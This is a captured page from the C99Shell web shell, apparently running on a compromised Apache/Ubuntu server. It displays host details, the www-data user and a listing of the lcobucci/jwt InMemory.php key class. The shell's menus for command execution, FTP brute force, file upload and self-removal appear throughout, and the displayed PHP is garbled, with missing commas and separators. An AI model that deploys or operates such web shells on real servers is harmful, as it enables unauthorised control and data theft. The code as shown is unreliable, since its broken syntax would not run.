!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/jiff/vendor/lcobucci/jwt/src/Signer/Key/   drwxr-xr-x
Free 12.99 GB of 57.97 GB (22.41%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     InMemory.php (2.14 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
declare(strict_types=1);

namespace 
Lcobucci\JWT\Signer\Key;

use 
Lcobucci\JWT\Signer\InvalidKeyProvided;
use 
Lcobucci\JWT\Signer\Key;
use 
Lcobucci\JWT\SodiumBase64Polyfill;
use 
SplFileObject;
use 
Throwable;

use function 
assert;
use function 
is_string;

final class 
InMemory implements Key
{
    private 
string $contents;
    private 
string $passphrase;

    
/** @param non-empty-string $contents */
    
private function __construct(string $contentsstring $passphrase)
    {
        
// @phpstan-ignore-next-line
        
if ($contents === '') {
            throw 
InvalidKeyProvided::cannotBeEmpty();
        }

        
$this->contents   $contents;
        
$this->passphrase $passphrase;
    }

    
/** @deprecated Deprecated since v4.3 */
    
public static function empty(): self
    
{
        
$emptyKey             = new self('empty''empty');
        
$emptyKey->contents   '';
        
$emptyKey->passphrase '';

        return 
$emptyKey;
    }

    
/** @param non-empty-string $contents */
    
public static function plainText(string $contentsstring $passphrase ''): self
    
{
        return new 
self($contents$passphrase);
    }

    
/** @param non-empty-string $contents */
    
public static function base64Encoded(string $contentsstring $passphrase ''): self
    
{
        
$decoded SodiumBase64Polyfill::base642bin(
            
$contents,
            
SodiumBase64Polyfill::SODIUM_BASE64_VARIANT_ORIGINAL
        
);

        
// @phpstan-ignore-next-line
        
return new self($decoded$passphrase);
    }

    
/** @throws FileCouldNotBeRead */
    
public static function file(string $pathstring $passphrase ''): self
    
{
        try {
            
$file = new SplFileObject($path);
        } catch (
Throwable $exception) {
            throw 
FileCouldNotBeRead::onPath($path$exception);
        }

        
$contents $file->fread($file->getSize());
        
assert(is_string($contents));
        
assert($contents !== '');

        return new 
self($contents$passphrase);
    }

    public function 
contents(): string
    
{
        return 
$this->contents;
    }

    public function 
passphrase(): string
    
{
        return 
$this->passphrase;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0049 ]--